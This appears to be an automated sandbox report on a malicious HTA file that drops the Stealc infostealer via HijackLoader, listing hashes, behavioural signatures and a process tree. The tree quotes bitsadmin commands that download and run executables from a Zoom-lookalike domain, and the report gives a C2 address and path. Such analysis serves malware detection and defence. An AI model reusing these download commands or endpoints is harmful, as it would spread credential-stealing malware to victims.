Analysis
-
max time kernel
132s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-10-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138.hta
Resource
win7-20240903-en
General
-
Target
92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138.hta
-
Size
74KB
-
MD5
acfba6ff2e80e0ebc80df9e7d326337c
-
SHA1
fe28d5756815fdac31a744a2f11c075f5b1892bc
-
SHA256
92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138
-
SHA512
2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00
-
SSDEEP
768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj
Malware Config
Extracted
stealc
sneprivate29
http://95.182.97.58
-
url_path
/84b7b6f977dd1c65.php
Signatures
-
Detects HijackLoader (aka IDAT Loader) 1 IoCs
resource yara_rule behavioral1/memory/2612-21-0x0000000000400000-0x0000000000561000-memory.dmp family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Blocklisted process makes network request 5 IoCs
flow pid Process 5 2380 mshta.exe 7 2380 mshta.exe 9 2380 mshta.exe 11 2380 mshta.exe 15 2380 mshta.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
pid Process 2652 bitsadmin.exe 2660 bitsadmin.exe -
Downloads MZ/PE file
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2612 set thread context of 2200 2612 stealc.exe 41 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1768 2352 WerFault.exe 47 -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2656 timeout.exe 2636 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 744 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2612 stealc.exe 2612 stealc.exe 2200 cmd.exe 2200 cmd.exe 2352 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2612 stealc.exe 2200 cmd.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2380 wrote to memory of 2736 2380 mshta.exe 33 PID 2380 wrote to memory of 2736 2380 mshta.exe 33 PID 2380 wrote to memory of 2736 2380 mshta.exe 33 PID 2380 wrote to memory of 2736 2380 mshta.exe 33 PID 2380 wrote to memory of 2652 2380 mshta.exe 35 PID 2380 wrote to memory of 2652 2380 mshta.exe 35 PID 2380 wrote to memory of 2652 2380 mshta.exe 35 PID 2380 wrote to memory of 2652 2380 mshta.exe 35 PID 2736 wrote to memory of 2656 2736 cmd.exe 37 PID 2736 wrote to memory of 2656 2736 cmd.exe 37 PID 2736 wrote to memory of 2656 2736 cmd.exe 37 PID 2736 wrote to memory of 2656 2736 cmd.exe 37 PID 2380 wrote to memory of 2612 2380 mshta.exe 38 PID 2380 wrote to memory of 2612 2380 mshta.exe 38 PID 2380 wrote to memory of 2612 2380 mshta.exe 38 PID 2380 wrote to memory of 2612 2380 mshta.exe 38 PID 2380 wrote to memory of 2612 2380 mshta.exe 38 PID 2380 wrote to memory of 2612 2380 mshta.exe 38 PID 2380 wrote to memory of 2612 2380 mshta.exe 38 PID 2380 wrote to memory of 2636 2380 mshta.exe 39 PID 2380 wrote to memory of 2636 2380 mshta.exe 39 PID 2380 wrote to memory of 2636 2380 mshta.exe 39 PID 2380 wrote to memory of 2636 2380 mshta.exe 39 PID 2612 wrote to memory of 2200 2612 stealc.exe 41 PID 2612 wrote to memory of 2200 2612 stealc.exe 41 PID 2612 wrote to memory of 2200 2612 stealc.exe 41 PID 2612 wrote to memory of 2200 2612 stealc.exe 41 PID 2380 wrote to memory of 2660 2380 mshta.exe 43 PID 2380 wrote to memory of 2660 2380 mshta.exe 43 PID 2380 wrote to memory of 2660 2380 mshta.exe 43 PID 2380 wrote to memory of 2660 2380 mshta.exe 43 PID 2736 wrote to memory of 744 2736 cmd.exe 46 PID 2736 wrote to memory of 744 2736 cmd.exe 46 PID 2736 wrote to memory of 744 2736 cmd.exe 46 PID 2736 wrote to memory of 744 2736 cmd.exe 46 PID 2612 wrote to memory of 2200 2612 stealc.exe 41 PID 2200 wrote to memory of 2352 2200 cmd.exe 47 PID 2200 wrote to memory of 2352 2200 cmd.exe 47 PID 2200 wrote to memory of 2352 2200 cmd.exe 47 PID 2200 wrote to memory of 2352 2200 cmd.exe 47 PID 2200 wrote to memory of 2352 2200 cmd.exe 47 PID 2200 wrote to memory of 2352 2200 cmd.exe 47 PID 2352 wrote to memory of 1768 2352 explorer.exe 49 PID 2352 wrote to memory of 1768 2352 explorer.exe 49 PID 2352 wrote to memory of 1768 2352 explorer.exe 49 PID 2352 wrote to memory of 1768 2352 explorer.exe 49
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138.hta"1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\timeout.exetimeout /t 30 /nobreak3⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2656
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:744
-
-
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2652
-
-
C:\Users\Admin\AppData\Local\Temp\stealc.exe"C:\Users\Admin\AppData\Local\Temp\stealc.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 8045⤵
- Program crash
PID:1768
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exe"C:\Windows\System32\timeout.exe" /T 2 /nobreak2⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2636
-
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer secondDownloadJob /download /priority foreground https://us18web-zoom.us/ram.exe C:\Users\Admin\AppData\Local\Temp\ram.exe2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2660
-
-
C:\Users\Admin\AppData\Local\Temp\ram.exe"C:\Users\Admin\AppData\Local\Temp\ram.exe"2⤵PID:2868
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\favicon[1].ico
Filesize5KB
MD5f3418a443e7d841097c714d69ec4bcb8
SHA149263695f6b0cdd72f45cf1b775e660fdc36c606
SHA2566da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA51282d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563
-
Filesize
1.0MB
MD5b7a38e03aefd3366bfade44bcac85ba6
SHA1c043abead4da49e00674d8815e0f85ed6b3c79c3
SHA256e0d8a1bcf0a809c29583cbaedb5cf8e5ccb8addbacf78d367d79f7437ae7f091
SHA512c16eb9f02242d6ebea451159c8d7fe2cda1fc395d35f1c3c3550fa435b8546400b60908113f0552982ecb42ddf0c7f9d2402b82b0ad2f64bfa615d81375f5504